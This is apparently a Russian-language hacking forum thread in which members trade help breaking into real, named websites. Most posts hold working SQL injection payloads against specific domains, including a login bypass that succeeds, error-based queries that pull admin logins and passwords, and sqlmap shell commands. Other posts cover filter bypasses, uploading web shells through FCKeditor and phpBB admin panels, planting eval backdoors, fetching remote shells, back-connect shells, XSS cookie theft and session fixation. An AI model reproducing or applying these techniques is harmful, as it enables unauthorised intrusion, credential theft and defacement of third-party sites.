просмотрел сайт, вот эти уязвимые к sql-inj параметры:


Code:
/bestof.php
begin
entout

/bestof_us.php
begin
entout

/blog.php
begin

/blog_us.php
begin

/livredor_lire.php
begin

/livredor_lire_us.php
begin

/maj.php
begin

/maj_us.php
begin

/photo
nom

/photo.php
nom

/photo_us
nom

/publications_site.php
begin

/publications_site_us.php
begin

/recherche_quoi.php
Afficher
begin
entout

/recherche_quoi_us.php
Afficher
begin
entout

/wallpapers.php
begin
entout

/wallpapers_us.php
begin
entout

но ни один не смог раскрутить...

borntobebad said:
ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut
http://www.pixheaven.net/bestof.php?begin=276&entout=12'
ili
http://www.pixheaven.net/photo.php?nom=120906_9930-46'


иньекция в лимите, поэтому ничего и не выходит

kokoy progoy ti naskanil eti dannie ? GhostW

qaz , tak tipo ne-kak ne razkrutit ?

borntobebad said:
qaz , tak tipo ne-kak ne razkrutit ?


нетс

qaz said:
иньекция в лимите, поэтому ничего и не выходит


Инъекция в Лимите прекрасно крутится.

Тут правильнее сказать "инъекция в лимите с использованием в запросе order by".

пацаны, как вы боритесь с ЧПУ?

GET

/page/id/5 - normal

/page/id/6-1 - показывает страницу 5

/page/id/5'


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1


уже понятно что всё довольно таки просто.

НО сраное чпу передаёт плюсы "как есть"


the right syntax to use near ''+and+--+' at line 1


та же хрень с пробелами, они превращаются в %20

/**/ - тоже не катит, этот каким-то образом влияет на само правило ЧПУ и параметры уходят не тому скрипту.

Без ссылки, как ты понимаешь, трудно сказать, но попробуй поиграйся с альтернативами пробела.

%09

%0D

%0A

Ну и не стоит забывать про "безпробельный" вариант запроса, что-то типа:

select(1)from(users)where(id=1)

Га-Ноцри said:
Без ссылки, как ты понимаешь, трудно сказать, но попробуй поиграйся с альтернативами пробела.
%09
%0D
%0A
Ну и не стоит забывать про "безпробельный" вариант запроса, что-то типа:
select(1)from(users)where(id=1)


игры с %09 etc ни к чему не приводят. запрос получается таким

select * from tbl where id=5%0D

в итоге


Unknown column '0D' in 'where clause'


уязвимый параметр находится не в скобках, а значит "безпробельный" тоже не получится.

Чакэ said:
та же хрень с пробелами, они превращаются в %20
/**/ - тоже не катит, этот каким-то образом влияет на само правило ЧПУ и параметры уходят не тому скрипту.


Это ЧПУ, можно попробовать реализовать так, как делается в REQUEST_URI и подобных случаях - В зависимости от сервера, мы напрямую в запросе(БЕЗ БРАУЗЕРА) без кодирования пробуем передать различные символы - (), TAB, %09, + и т.п. и с их кодированием соответственно и смотрим на то, что получается. Если никакие символы не интерпретируются в их аналоги, а всё лишнее кодируется то инъекцию почти всегда провести невозможно, за исключением некоторых простых случаев.

Нужно попробовать использовать различные методы кодирования и определить пропускные символы, интерпретацию мультибайтовых кодировок, какие-то непонятные случаи и дальше исходить от этого.

\/IRUS said:
в случае если параметр передается явно в
GET
запросе и именем
s
, по условию исключаем Error-Based и Union техники то SQL-shell можно будет вызвать:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php?s=1" --technique="BT" --level=5 --sql-shell
в
POST
параметре
s
:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --data="s=1" --technique="BT" --level=5 --sql-shell
в
Cookie
параметре
s
:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --cookie="s=1" --technique="BT" --level=5 --sql-shell
в
Referer
:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p referer --technique="BT" --level=5 --sql-shell
в
User-Agent
:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p user-agent --technique="BT" --level=5 --sql-shell
в любом добавочном хидере:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --headers="Accept-Language: fr\nETag: 1%1" --technique="BT" --level=5 --sql-shell
и т.д.


Эх, попробовал.....

происходит редирект на login.php, ни auth ни cookie не помогают

Подскажите..

Вобщем раскрутил скулю, получил логин|пароль, но подозрительно что пароли хранятся в бд без хеширования, т.е. просто пасс лежит. Беру пары логин|пароль, пробую зайти в админку - нифига В чем может быть причина? В бд колонок с логинами\паролями больше нет...

Данные для входа хранятся не в БД, а в файле. Такое часто встречается, смиритесь!

Если есть права у пользователя БД на работу с файлами и известен пусть к сайту, можете попробовать поискать и почитать файлы конфигов!

BigBear . где прочитать на тему раскрутки лимита ? И еше , тут лимит на SELECT нарисовался , его можно обойти ? ели да то где почитать на эту тему ???

borntobebad said:
BigBear . где прочитать на тему раскрутки лимита ? И еше , тут лимит на SELECT нарисовался , его можно обойти ? ели да то где почитать на эту тему ???


Выдержка со RDOT'а

В limit, offset

(в запросе не должен присутствовать order by)

script.php?par=1,111111111 union select version(),2,3,4--

script.php?par=111111111 union select version(),2,3,4--

сорь, может не в тему но, слили БД сайта, админку найти не могу, в БД таюлици имеют префикс xpanel - в гугле ничего не могу найти про этот двиг, офф сайт уже давно в оффе, может кто что знает про етот двиг? где там админку можно найти?

Always said:
http://adjump.ru/
пост
logsecurecash=1&login_name=[SQL inj]&login_pass=111111&x=31&y=13
перепробовал различные варианты...никак.


logsecurecash=1&login_name=' or 1#&login_pass=111111&x=31&y=13

Вы зашли как: advaweb

Баланс: 10 руб.

cat1vo said:
logsecurecash=1&login_name=
' or 1#
&login_pass=111111&x=31&y=13
Вы зашли как:
advaweb
Баланс: 10 руб.


Стыдно, спасибо

pharm_all said:
Mssql
Надо вывести name lastname email
(select top 1 cast(name as nvarchar)+char(0x7a)+cast(email as nvarchar) from member where id=4)--
вывод: name:email@email.com
Как вывести еще lastname в одном запросе , если делаю
(select top 1 cast(name as nvarchar)+char(0x7a)+cast(
lastname
as nvarchar+char(0x7а)+cast(email as nvarchar) from member where id=4)--
Не выводит 3 значение :
name:lastname:email@email.com
Как вывести одним запросом 3 значения?


Потому что скобку забыл в запросе

(select top 1 cast(name as nvarchar)+char(0x7a)+cast(lastname as nvarchar)+char(0x7а)+cast(email as nvarchar) from member where id=4)--

Подскажите по поводу FCKeditor 2.5.1 Build 17566

txt файлы спокойно льются, а вот php никак нехочет пробывал:

1) Через /php/upload.php?Type=Media

2) Грузил txt указывал в Current Folder: wso.php%00

3) Пробывал %00 в url-decode, так же пробывал wso2.php%00.txt

Что посоветуете? других дыр нет есть еще CKEditor 3.2.1

Двиг: Powered by cc Engine (китайский двиг)

P.S>.htaccess так же не грузит

Подскажите в чем может быть проблема

Сообственно пытаюсь лить шелл через админку phpbb 3 через стили

Включаю выполнение php кода в шаблонах, иду в шаблоны faq_body.html

впиливаю код

Иду в forum.com/faq.php?c=phpinfo(); пхпинфо не выводится = \

Подскажите почему может не выполнятся пхпкод

права в админке полные, мб можно еще какнить залить?

cat1vo said:
Что за бред, думать надо хоть не много головой, инъекция в куках, а Вы хотите их отключить? Тут дело в другом, человек совершенно не умеет этим всем пользоваться и работать с тем, что нашел ему сканер, да и по всей видимости, сам не понимает, что хочет.
Все отлично работает, запрос переделал, мне так удобнее...

Code:
Host: game.*****.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Cookie: login=demodemo; pass="or(1)group+by(mid((select+concat_ws(0x3a,version() ,schema())),rand(0)|0))having(avg(0))or"

Duplicate entry '
5.5.29-1-log:s10parl
' for key 'group_key'
Версия -
5.5.29-1-log
Названия Базы Данных -
s10parl
"or(1)group+by(mid((
СЮДА ВСТАВЛЯЙТЕ СВОЙ ЗАПРОС
),rand(0)|0))having(avg(0))or"
Дальше делайте сами, если не знаете как, на форуме есть мануал -
ССЫЛКА (https://antichat.live/threads/43966/)
З.Ы. Для работы можете пользоваться тем же Acunetix, Burp Suite, Firefox (Live HTTP Headers) или HTTPAnalyzer (я предпочитаю его)!


пытаюсь отправить запросы для вывода данных хотя бы юзеров.

то и дело выходят ошибки :


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' at line 1




Table 'panel.users' doesn't exist




Table 'panel.***' doesn't exist


Подскажите где взять список запросов?

panfilov1991 said:
пытаюсь отправить запросы для вывода данных хотя бы юзеров.
то и дело выходят ошибки :
Подскажите где взять список запросов?


а какой запрос вы делайте? покажите.

winstrool said:
а какой запрос вы делайте? покажите.




"or(1)group+by(mid((SELECT * FROM users WHERE login='Admin' AND pass='123' OR login='Admin' --''),rand(0)|0))having(avg(0))or"


ошибка :


Table 'panel.users' doesn't exist



Как можно вывести названия таблиц?

Очень надо вывести логин и пасс админа

panfilov1991 said:
ошибка :
Как можно вывести названия таблиц?
Очень надо вывести логин и пасс админа




"or(1)group+by(mid((SELECT concat_ws(0x3a,login,pass) FROM users WHERE login=0x41646D696E limit 0,1),rand(0)|0))having(avg(0))or"


там где значение 0x41646D696E это Admin, вам бы мануалы по mysql почитать!

winstrool said:
там где значение 0x41646D696E это Admin, вам бы мануалы по mysql почитать!


Мне реально стыдно! я уже их перечитался!

мне бы пароль админа содрать, или таблицы вывести с БД

GroM88 said:
Подскажите в чем может быть проблема
Сообственно пытаюсь лить шелл через админку phpbb 3 через стили
Включаю выполнение php кода в шаблонах, иду в шаблоны faq_body.html
впиливаю код
Иду в forum.com/faq.php?c=phpinfo(); пхпинфо не выводится = \
Подскажите почему может не выполнятся пхпкод
права в админке полные, мб можно еще какнить залить?


так вставляй


PHP:
phpinfo();



panfilov1991 said:
Мне реально стыдно! я уже их перечитался!
мне бы пароль админа содрать, или таблицы вывести с БД



так а в чём собственно проблема?

qaz said:
так вставляй

PHP:
phpinfo();



ни какого эффекта) ничего не выводит = \

я уже пробовал так)

winstrool said:
"or(1)group+by(mid((SELECT concat_ws(0x3a,login,pass) FROM users WHERE login=0x41646D696E limit 0,1),rand(0)|0))having(avg(0))or"
там где значение 0x41646D696E это Admin, вам бы мануалы по mysql почитать!


Тебе бы тоже хоть что нибудь почитать, вместо того что бы советы давать.


panfilov1991 said:
Table 'panel.users' doesn't exist

KolosJey said:
Тебе бы тоже хоть что нибудь почитать, вместо того что бы советы давать.


он ему запрос дал и посоветовал мускуль подучить, чтоб он сам смог вывести таблицы, а ты тупо "умничаешь."

Делаю такой запрос

1+UnIon+selECt+1,2,3,4,5,6,version(),8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42&x=-392&y=-378 true

1+UnIon+selECt+1,2,3,4,5,6,group_concat(table_name ),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42+from+INFORMATION_SCHEMA.TABLES+--+&x=-392&y=-378 false

Выдает

Illegal mix of collations for operation 'UNION'

Как быть?

Always said:
Делаю такой запрос
1+UnIon+selECt+1,2,3,4,5,6,version(),8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42&x=-392&y=-378 true
1+UnIon+selECt+1,2,3,4,5,6,group_concat(table_name ),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42+from+INFORMATION_SCHEMA.TABLES+--+&x=-392&y=-378 false
Выдает
Illegal mix of collations for operation 'UNION'
Как быть?


Если не ошибаюсь, то такая ошибка обычно связана с проблемами в кодировке. И, судя по всему, в ошибке в вашем случае явно не указана нужная. Если ошибаюсь то меня поправят.

Немного пищи для размышления:

cast(version()+as+binary)

convert(version(),binary)

convert(version()+using+latin1)

convert(version()+using+binary)

aes_decrypt(aes_encrypt(version(),1),1)

unhex(hex(version()))

Попробуйте при выводе нужной информации использовать приведенные выше примеры.

ребят,хелп ми,плз

есть уязвимость 'PHP Code execution'...выполняются phpinfo(),system(ls) и т.д.....слэшируются кавычки,хотя MQ=Off...всё бы ничего,можно было бы обойти c помощью base64,либо system($_GET[a])...но режутся заглавные....

что можно сделать в данном случае?

HeaVeNSeR said:
ребят,хелп ми,плз
есть уязвимость 'PHP Code execution'...выполняются phpinfo(),system(ls) и т.д.....слэшируются кавычки,хотя MQ=Off...всё бы ничего,можно было бы обойти c помощью base64,либо system($_GET[a])...но режутся заглавные....
что можно сделать в данном случае?


print(`я консольная команда`);

Konqi said:
print(`я консольная команда`);


не совсем понял...)

как,к примеру,вывести результат system('ls -la')? (экранируются кавычки и режутся заглавные)

HeaVeNSeR said:
не совсем понял...)
как,к примеру,вывести результат system('ls -la')?
(экранируются кавычки и режутся заглавные)


Такая кавычка тоже режится ?


`


Как насчет


%27


или


%60


?

WendM said:
Такая кавычка тоже режится ?
Как насчет или ?


такая кавычка не режется, print(`ls -la`) сработало...но теперь похоже режутся слэши...ни ls ../,ни ls ..\ не срабатывает...соотв-но,залиться тоже не получается...

есть ещё варианты?

help

Парни, хелп!


Code:
_ttp://www.infotopcar.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=-3473%20UNION%20ALL%20SELECT%200,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,CONCAT%280x7e,version%28%29,0x7e%29,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0--%20&tipo=auto

Не получается продвинуть далее.

Zahar said:
Парни, хелп!

Code:
_ttp://www.infotopcar.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=-3473%20UNION%20ALL%20SELECT%200,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,CONCAT%280x7e,version%28%29,0x7e%29,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0--%20&tipo=auto

Не получается продвинуть далее.




Code:
www.infotopcar.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=-3473 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,t able_name,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67, 68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84 ,85, 86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101, 103,104,105,106,107,108,109,110,111,112,113,114,11 5,116,117,118,119,120,121,122,123,124,125,126,127, 128,129,130,131,132,133,134,135,136,137,138,139,14 0,141,142,143,144,145,146,147,148,149,150,151,152, 153,154,155,156+from+information_schema.tables+whe re+table_schema=0x706f7274616c636c7562+limit+0,1--+-&tipo=auto

Есть булковский форум, прописал в faq_complite eval($_GET[e]);.

Вроде бы все хорошо, пхп инфо выводиться, но вот только:


Code:
allow_url_include Off
allow_url_fopen Off

Интересует, как заливаться в данной непростой ситуации? До этого пробывал вгетом лить в tmp, вроде бы все залилось, только вот site.com/tmp/shell.php не открывается, и выдает 404 ошибку. И да, на всех папках стоят права nobody(мб это как-то влияет?).

Заранее спасибо

Boombilka said:
Есть булковский форум, прописал в faq_complite eval($_GET[e]);.
Вроде бы все хорошо, пхп инфо выводиться, но вот только:

Code:
allow_url_include Off
allow_url_fopen Off

Интересует, как заливаться в данной непростой ситуации? До этого пробывал вгетом лить в tmp, вроде бы все залилось, только вот site.com/tmp/shell.php не открывается, и выдает 404 ошибку. И да, на всех папках стоят права nobody(мб это как-то влияет?).
Заранее спасибо


пропиши eval(base64_decode($_GET[e]));

и юзай курл

Привет всем!

Помогите пожалуйста разобраться с XSS-уязвимостями. Не совсем понятно, как использовать их, чтобы к примеру получить чужие cookies, а не свои.

Что делать с такого вида уязвимостями?


Code:
URL encoded POST input poll%5Btitle%5D was set to '"()&%1prompt(911011)

или


Code:
URL encoded POST input character%5bdescription%5d was set to 1
The input is reflected inside a text element.

Также интересует уязвимости типа "HTML form without CSRF protection" можно использовать для подмены данных или не только?

Сообственно впервые столкнулся с такой проблемой)

Вообщем через скуль добыл пасс от рута мускула , на сайте есть phpmyadmin

Сообственно пытался залить шелл через пхпмуадмин и столкнулся с такой проблемой

а именно с определение пути к сайту

например мой сайт называется sqlinject.com

sqlinject.com/news.php?id=1'

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/vhost/sql.com/news.php on line 63

так же в корне присувствует файл phpinfo в котором путь так же прописан таким образом /var/www/vhost/sql.com/phpinfo.php

Решил посмотреть сайты на одном ип в итоге получил список из 50+ сайтов... попробовал просканить эти сайты на директории и файлы оказалось что в каждом сайте присувствуют такие файлы config.php, connect.php, phpinfo.php и еще куча файлов. вообщем файлы одни и теже на каждом сайте... это я клоню к тому что файлы эти посути лежат в одной директории, но контент на сайтах разный совершенно...

в файле phpinfo.php на каждом сайте один и тот же путь) "/var/www/vhost/sql.com/phpinfo.php"

Пробовал прочитать файл через LOAD_FILE например phpinfo с пути написанного выше) не читает... хотя /etc/passwd читает)

Чисто для читалки попробовал залить минишелл через пхпмуадмин в /tmp/

Шелл залился и прочитался через LOAD_FILE

Сообственно интересует вопрос возможно ли как-то получить настоящий путь к сайту sqlinject.com, что бы залится)

Мб есть у кого какие нить соображения по этому поводу?)

Есть папочка icons от апача) но она походу не доступна для записи) да и путь искать надо)

Если есть у кого желание помочь и поломать голову)) могу предоставить root;pass к phpmyadmin ))

http://bkwar.ru/news/?topic=494 Протестил через Хавиж (ну первонюбские примычки) Скюля методом стринг. Хавиж выводит Бд всё нормально таблицы и так далее...

Ихнее http://bkwar.ru/www/labirint3/ulldie.php Пхпинфо

ИСП мэнэджер тут https://bkwar.ru:1500/

Ещё БД тут http://bkwar.ru/pgadmin/

Открытые порты сканеные через нмап : 110 , 143, 1500 , 21 ,22 , 443 , 4444 ,5000 ,53 , 993 ,995 ну и соотвественно 80.

Что нашёл webshag Напишу более подозрительные

/robots.txt found. It might be interesting to have a look inside.

/bin/ Directory indexing is enabled: CGI directory

/bin/ This might be interesting... possibly a system shell found.

/webmail/src/read_body.php This might be interesting... has been seen in web logs from an unknown scanner.

Ну есть ещё уйма директорий ...

А да сканер Дирбустер показал это : http://bkwar.ru/myadmin/setup/index.php

Пробовал разные варианты прочитанные и не прочитанные. А у них отключенно выползание ерророк (тут и ступор).

Недельки две мучаюсь. может подскажите как как всё это преодолеть и вынести результат в браузер.

Прошу прощение если не туда всунул вопрос. Ещё не освоился у вас...

нужно вывести username,password при помощи sqlmap, где usertype=Administrator

http://blindcanadians.ca/press_releases/index.php?BriefID=50+union+select+concat_ws(0x3a,u sername,password)+from+users+where+usertype='Admin istratot'+--+

так дампится вся база, как сделать так, чтобы выводился только Administrator?

sqlmap -u "http://blindcanadians.ca/press_releases/index.php?BriefID=50" --dump -T users -v 1

я тут с такой поблемой столкнулся, залил на сайт шелл, отредактировал морду, открываю сам сайт, изменений ноль, смотр на Server IP: там написано 127.0.0.1 что ет за фигня такая?

qaz said:
я тут с такой поблемой столкнулся, залил на сайт шелл, отредактировал морду, открываю сам сайт, изменений ноль, смотр на Server IP: там написано 127.0.0.1 что ет за фигня такая?


посмотри с другово браузера этот же сайт, или просто очисти кеш

OxoTnik said:
посмотри с другово браузера этот же сайт, или просто очисти кеш


та это тут не причём, индекс действительно не изменился, вот если удалить файл то да, напишет ошибку, а от изменений ноль толку

И чего удивительного? Наверняка какой нибудь APC cache или что-то из этой оперы стоит. При изменении кеш просто не успевает обновиться, а при удалении файловый идентификатор из ФС исчезает и в opcode кешер вносится соответствующая информация. Посмотри что используется в phpinfo и если тот же APC то у него есть менеджер одним файлом в котором удобно обнулять кеш.

По поводу IP учите матбазу господа. В стандартной связке nginx+apache, к примеру, фронтэнд вешается на внешний интерфейс имеющий уникальный IP, в то время как бэкэнд вешается на локальный те localhost он же 127.0.0.1. А так как php выполняется на уровне бэкэнда будь то mod_php или cgi, то и переменная окружения которая выводится в serverIP имеет оный localhost

Cennarios said:
И чего удивительного? Наверняка какой нибудь APC cache или что-то из этой оперы стоит. При изменении кеш просто не успевает обновиться, а при удалении файловый идентификатор из ФС исчезает и в opcode кешер вносится соответствующая информация. Посмотри что используется в phpinfo и если тот же APC то у него есть менеджер одним файлом в котором удобно обнулять кеш.
По поводу IP учите матбазу господа. В стандартной связке nginx+apache, к примеру, фронтэнд вешается на внешний интерфейс имеющий уникальный IP, в то время как бэкэнд вешается на локальный те localhost он же 127.0.0.1. А так как php выполняется на уровне бэкэнда будь то mod_php или cgi, то и переменная окружения которая выводится в serverIP имеет оный localhost



чего ты так рагорячился)) мы же не такие про как ты))

глянул пхп инфо, есть там apc, как там обнулить кеш?

погугли - apc.php manager по самому первому линку там можно скачать скрипт. Очень просто настраивается. В правом верхнем углу кнопка - clear opcode cache. Меняешь php файл. Обнуляешь кеш, заново инициируешь запуск файла в который были внесены изменения. Стоит отметить, что далее в frontend-backend данные от бэкенда попадают в тот же файловый кеш нгинкса или мемкеш. Так что если все равно не обновится значит копать в эту сторону.

Как пользоваться PHPSESSID session fixation дайте ссылку на топ

Groove said:
Как пользоваться
PHPSESSID session fixation
дайте ссылку на топ


Возможный путь использования XSS:


PHP:
-Нахождение XSS

-Впаривание XSS

-Получение PHPSESSID

-Заход под PHPSESSID



PHPSESSID session fixation:


PHP:
-Создание своего уже-известного PHPSESSID

-Установка этого PHPSESSID у у� �аленого человека(Впариван ие)

-Он авторизуется по этим PH PSESSID

-Мы заходим под уже извест ным PHPSESSID



Может использоваться как альтернатива кражи куков в некоторых случаях, при впаривани методом соц. инженерии, при отправке скомпрометированного ответа сервером.

Установка PHPSESSID может быть в параметрах методом GET, а не только через куки.

http://www.acros.si/papers/session_fixation.pdf

отправляю запрос на сервер


"or(1)group+by(mid((SELECT concat_ws(0x3a,login,pass) FROM users WHERE login=0x41646D696E limit 0,1),rand(0)|0))having(avg(0))or"


Выдает :


Table 'panel.users' doesn't exist


Сайт


http://game.parlahost.ru/

panfilov1991 said:
отправляю запрос на сервер
Выдает :
Сайт


Нужно вывести лог и пасс админа

Есть шелл(с нормальным PR), но на этом шелле хостятся еще приличное кол-во нулевиков, папки открыты(с нулевика можно спокойно залится на сайт с норм PR), возник вопрос:

можно ли какнить изменить права на доступ с этих нулевиков в другие папки?

Cherep said:
Есть шелл(с нормальным PR), но на этом шелле хостятся еще приличное кол-во нулевиков, папки открыты(с нулевика можно спокойно залится на сайт с норм PR), возник вопрос:
можно ли какнить изменить права на доступ с этих нулевиков в другие папки?


Можно, если в заливаемой папке полные права или принадлежат одной группе!

Имеется у нас сайт N, а на этом сайте уязвимость /search/?name=, пропускающая PHP-инъекции, то есть запрос /search/?name={${phpinfo()}} выводит phpinfo. В результате бурного гугления пришёл к такому инжекту: name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));.

И вроде бы, лепота, да прав нет, словно у негра в XX веке в США(исторический факт, расизм - нихарашо). С copy(), как и с file_put_contents() разобраться не могу, хотя сам понимаю, что это вроде бы элементарно. Поэтому и прошу совета. Заранее благодарен!

rogatiy said:
Имеется у нас сайт N, а на этом сайте уязвимость
/search/?name=
, пропускающая PHP-инъекции, то есть запрос
/search/?name={${phpinfo()}}
выводит phpinfo. В результате бурного гугления пришёл к такому инжекту:
name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));
.
И вроде бы, лепота, да прав нет, словно у негра в XX веке в США(исторический факт, расизм - нихарашо). С copy(), как и с file_put_contents() разобраться не могу, хотя сам понимаю, что это вроде бы элементарно. Поэтому и прошу совета. Заранее благодарен!


eval(file_get_contents('шелл'));. шелл выполняется, просто прав нет или код шелл даже не исполняется? Если первое, то ищи способы поднять привилегии

rogatiy said:
Имеется у нас сайт N, а на этом сайте уязвимость
/search/?name=
, пропускающая PHP-инъекции, то есть запрос
/search/?name={${phpinfo()}}
выводит phpinfo. В результате бурного гугления пришёл к такому инжекту:
name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));
.
И вроде бы, лепота, да прав нет, словно у негра в XX веке в США(исторический факт, расизм - нихарашо). С copy(), как и с file_put_contents() разобраться не могу, хотя сам понимаю, что это вроде бы элементарно. Поэтому и прошу совета. Заранее благодарен!


Локальные файлы инклудятся?

Если можешь проинклудить файл например с папки /tmp/, то попробуй залится через phpinfo )

десять раз так получалось))

попугай said:
eval(file_get_contents('шелл'));. шелл выполняется, просто прав нет или код шелл даже не исполняется? Если первое, то ищи способы поднять привилегии


Выполняется, прав нет вообще, даже файлы вывести не может.


GroM88 said:
Локальные файлы инклудятся?
Если можешь проинклудить файл например с папки /tmp/, то попробуй залится через phpinfo )
десять раз так получалось))


В конкретном случае, который я пытаю сейчас, да, url_include работает, но давайте рассматривать вот такой расклад:

allow_url_fopen On

allow_url_include Off

Понимаю, что шелл надо бы залить, желательно в tmp, ибо там, вроде 777, но как? Можно сразу узнать готовый код? cmd=copy('сайт/шелл.тхт','shell.php'); не выполняется, а cmd=eval(file_put_contents('сайт/шелл.тхт','shell.php')); тоже, а больше функций я и не знаю Если вдруг нужны какие-то ещё данные из phpinfo - пишите.

PS: Как залить через phpinfo то?

cmd=


Откуда ты взял это cmd?

rogatiy said:
В результате бурного гугления пришёл к такому инжекту:
name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));
.


Вот.

rogatiy said:
Вот.


Что вы мозги себе еб***. заливаешь на хостинг\дедик\к себе на комп если ип-белый код шелла без в формате .txt.

далее с бэкдора запускаешь=>?cmd=eval(file_get_contents('http://myhosting/fileScodomShell'a.txt')); =>PROFIT!!! всегда робит ,а там уже делай, что хочешь...если фильтры юзай char/base64_decode

blesse said:
Что вы мозги себе еб***. заливаешь на хостинг\дедик\к себе на комп если ип-белый код шелла без в формате .txt.
далее с бэкдора запускаешь=>?cmd=eval(file_get_contents('http://myhosting/fileScodomShell'a.txt')); =>PROFIT!!! всегда робит ,а там уже делай, что хочешь...если фильтры юзай char/base64_decode


Вопрос - это ты не умеешь читать, или я объяснять? Шелл выводится, работает, но прав нет. Вообще. Даже файлы не отображает.

Спасибо помогли в минусовом смысле....

rogatiy said:
Вопрос - это ты не умеешь читать, или я объяснять? Шелл выводится, работает, но прав нет. Вообще. Даже файлы не отображает.


Могут быть функции отключены некоторые, редко файлы не отображаются, делай биндпрот\бэкконект первой командой и будет тебе счастье.

rogatiy said:
Имеется у нас сайт N, а на этом сайте уязвимость
/search/?name=
, пропускающая PHP-инъекции, то есть запрос
/search/?name={${phpinfo()}}
выводит phpinfo. В результате бурного гугления пришёл к такому инжекту:
name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));
.
И вроде бы, лепота, да прав нет, словно у негра в XX веке в США(исторический факт, расизм - нихарашо). С copy(), как и с file_put_contents() разобраться не могу, хотя сам понимаю, что это вроде бы элементарно. Поэтому и прошу совета. Заранее благодарен!


Какой шелл пытаешься выполнять?

Попробуй этот http://rusfolder.com/35507131 файлы\директории должны выводится.

Есть форум с XSS уязвимостью в названии темы. Что можно сделать для получения паролей, кроме как сниффером читать куки?

DarkSorcerer said:
Какой шелл пытаешься выполнять?
Попробуй этот http://rusfolder.com/35507131 файлы\директории должны выводится.


WSO без пароля не выводил, загнал mobi - вывел. Куда шагать теперь? Между папками переключаться не получается, ибо шелл на сервере не сохранён.


blesse said:
Могут быть функции отключены некоторые, редко файлы не отображаются, делай биндпрот\бэкконект первой командой и будет тебе счастье.


Не работает вроде, во всяком случае биндпорт.

PS: Ребят, огромное спасибо за помощь, на RDot'e послали лесом, причём не кто-то, а модератор.

rogatiy said:
WSO без пароля не выводил, загнал mobi - вывел. Куда шагать теперь? Между папками переключаться не получается, ибо шелл на сервере не сохранён.
Не работает вроде, во всяком случае биндпорт.
PS: Ребят, огромное спасибо за помощь, на RDot'e послали лесом, причём не кто-то, а модератор.


Ищи директорию с правами на запись, хотя возможно там даже есть запись во всех директориях. Ты можешь ходить по каталогам из шелла что я тебе дал, используй GET запросы, копируй ссылку "на уровень вверх" например и подставляй переменную с параметрами из этой ссылки в адресной строке.

Может немного не в тему, но все-же:

Есть рабочий site.com.ua

И есть файлы, доступные для скачивания по адресам p.site.com.ua/[имя файла] и l.site.com.ua/[имя файла], на которые никакого намека в конфигах не нашел. Сам сайт расположен в opt/www/public/index.php причем на нем есть раскрытие путей (так и раскрыл конфиги), как такое может быть сделано и как это можно использовать? Спасибо

Иногда попадаються шелы на которых много доменов но они подписаны не как название сайта site.ru а наприме hzhzhzhz как узнать какой это домен если он не прописан не в robots.txt и т.д,есть ли какой-то скрипт который отправляет инфу о домене например на мыло?Спасибо.

Sat-hacker said:
